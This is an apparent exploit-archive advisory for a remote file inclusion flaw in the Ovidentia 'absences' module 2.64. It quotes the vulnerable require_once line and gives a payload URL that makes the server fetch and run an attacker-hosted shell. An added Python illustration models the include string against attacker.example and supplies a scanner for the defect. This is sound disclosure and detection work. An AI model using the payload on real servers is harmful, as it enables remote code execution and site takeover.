Ovidentia absences Module 2.64 - Remote File Inclusion Vulnerability

2015-12-15T00:00:00
ID 1337DAY-ID-24734
Type zdt
Reporter bd0rk
Modified 2015-12-15T00:00:00

Description

Exploit for php platform in category web applications

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
 
 
Proof-of-Concept:
 
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
 
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
 
---------------------------------------------------------------
 
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
 
 
Description: When planning.php is requested directly (instead of through the Ovidentia front controller that normally sets it), $GLOBALS['babInstallPath'] is never assigned before the require_once on line 26.
             With register_globals enabled, the request parameter GLOBALS[babInstallPath] supplies that value, so require_once fetches and executes attacker-controlled PHP from a remote URL. The trailing "?" in the payload turns the hard-coded 'utilit/defines.php' suffix into the query string of the attacker's URL instead of part of its path.
             Preconditions: register_globals=On (removed in PHP 5.4) and allow_url_include=On (with allow_url_fopen=On) for the remote include to be honoured.
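The following Python is an added illustration, not code from the advisory or from Ovidentia. It models two things the text above describes: how the attacker's value and the hard-coded 'utilit/defines.php' suffix combine into the string require_once sees (and why the trailing "?" matters), and a small static check that flags include/require statements keyed on a $GLOBALS entry that the same file never assigns. The PHP snippets, the host attacker.example and the guarded variant are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt mirroring planning.php line 26 as quoted in the advisory;
# nothing above the require_once assigns babInstallPath.
PLANNING_PHP = """<?php
// constructed excerpt for this example, not the real planning.php
$tg = 'absences';
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
"""

# Hypothetical guarded variant: the path is derived from the file's own
# location before the include, so a request-supplied value is never used.
GUARDED_PHP = """<?php
$GLOBALS['babInstallPath'] = dirname(__DIR__) . '/';
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
"""

HARDCODED_SUFFIX = "utilit/defines.php"


def effective_include_target(request_value):
    """String require_once evaluates when register_globals lets the request
    populate $GLOBALS['babInstallPath'] (concatenation from line 26)."""
    return request_value + HARDCODED_SUFFIX


def split_remote_target(target):
    """Break the include target into (scheme, host+path, query) so the effect
    of a trailing '?' in the attacker value is visible."""
    parts = urlsplit(target)
    return parts.scheme, parts.netloc + parts.path, parts.query


# include/require of a $GLOBALS['key'] value, e.g. require_once $GLOBALS['x'] . '...'
INCLUDE_RE = re.compile(
    r"""\b(?:require|include)(?:_once)?\s*\(?\s*\$GLOBALS\[\s*['"]([A-Za-z_]\w*)['"]\s*\]"""
)


def _assigned_before(key, earlier_source):
    """True if $GLOBALS['key'] or the global $key is assigned in earlier lines
    (a '==' comparison does not count)."""
    k = re.escape(key)
    pat = rf"""(?:\$GLOBALS\[\s*['"]{k}['"]\s*\]|\${k})\s*=(?!=)"""
    return re.search(pat, earlier_source) is not None


def find_unguarded_global_includes(php_source):
    """Return [(line_number, key)] for includes whose $GLOBALS key is not
    assigned anywhere earlier in the same file: candidates for the defect
    described in the advisory (a direct request to the file leaves the key
    to whatever register_globals hands over)."""
    lines = php_source.splitlines()
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in INCLUDE_RE.finditer(line):
            key = m.group(1)
            earlier = "\n".join(lines[: lineno - 1])
            if not _assigned_before(key, earlier):
                findings.append((lineno, key))
    return findings


if __name__ == "__main__":
    # With the trailing '?', the suffix becomes a harmless query string;
    # without it, the suffix is glued onto the remote path.
    for v in ("http://attacker.example/shell.txt?", "http://attacker.example/shell.txt"):
        print(v, "->", split_remote_target(effective_include_target(v)))
    print("vulnerable:", find_unguarded_global_includes(PLANNING_PHP))
    print("guarded:   ", find_unguarded_global_includes(GUARDED_PHP))
```

The scanner is deliberately file-local: Ovidentia's front controller does set babInstallPath before loading a module, so the finding only matters for files that are reachable by a direct HTTP request, which is exactly the case the advisory exploits.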

#  0day.today [2018-03-02]  #